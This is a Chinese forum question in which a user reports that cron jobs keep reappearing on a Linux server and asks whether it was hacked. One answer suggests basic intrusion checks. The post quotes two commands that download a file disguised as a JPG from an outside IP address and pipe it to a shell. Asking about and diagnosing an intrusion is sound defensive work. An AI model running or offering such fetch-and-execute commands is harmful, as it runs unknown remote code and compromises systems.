pugrand123 2017-03-21 09:29 采纳率: 0%
浏览 2175
已结题

Linux服务器莫名自动加入两个定时任务,是不是被入侵了?

wget -O - -q http://45.32.159.84/html/icon.jpg|sh
curl http://45.32.159.84/html/icon.jpg|sh
crontab定时任务每十五分钟执行一次上面两个命令,删了后,隔不了多久去看又出来了。
求教各位大神是什么原因,是不是服务器被入侵了。

  • 写回答

1条回答 默认 最新

  • lumen.fun 2017-03-21 09:51
    关注

    如果想确认是否被入侵,可以按照下面步骤尝试检查一下:
    第一 查看防火墙配置是否有限制对外访问的端口
    第二个 查看一下是否安装了redis 或者是memcache 但是没有设置auth 密码或者是admin 密码,没有设置有被入侵可能
    第三个就是就是在终端输入ps aux 或者是top命令查看是否有异常的程序在运行,如果有找到相关的位置确认是否有问题

    评论

报告相同问题?

悬赏问题

  • ¥15 oracle集群安装出bug
  • ¥15 关于#python#的问题:自动化测试
  • ¥20 问题请教!vue项目关于Nginx配置nonce安全策略的问题
  • ¥15 教务系统账号被盗号如何追溯设备
  • ¥20 delta降尺度方法,未来数据怎么降尺度
  • ¥15 c# 使用NPOI快速将datatable数据导入excel中指定sheet,要求快速高效
  • ¥15 再不同版本的系统上,TCP传输速度不一致
  • ¥15 高德地图点聚合中Marker的位置无法实时更新
  • ¥15 DIFY API Endpoint 问题。
  • ¥20 sub地址DHCP问题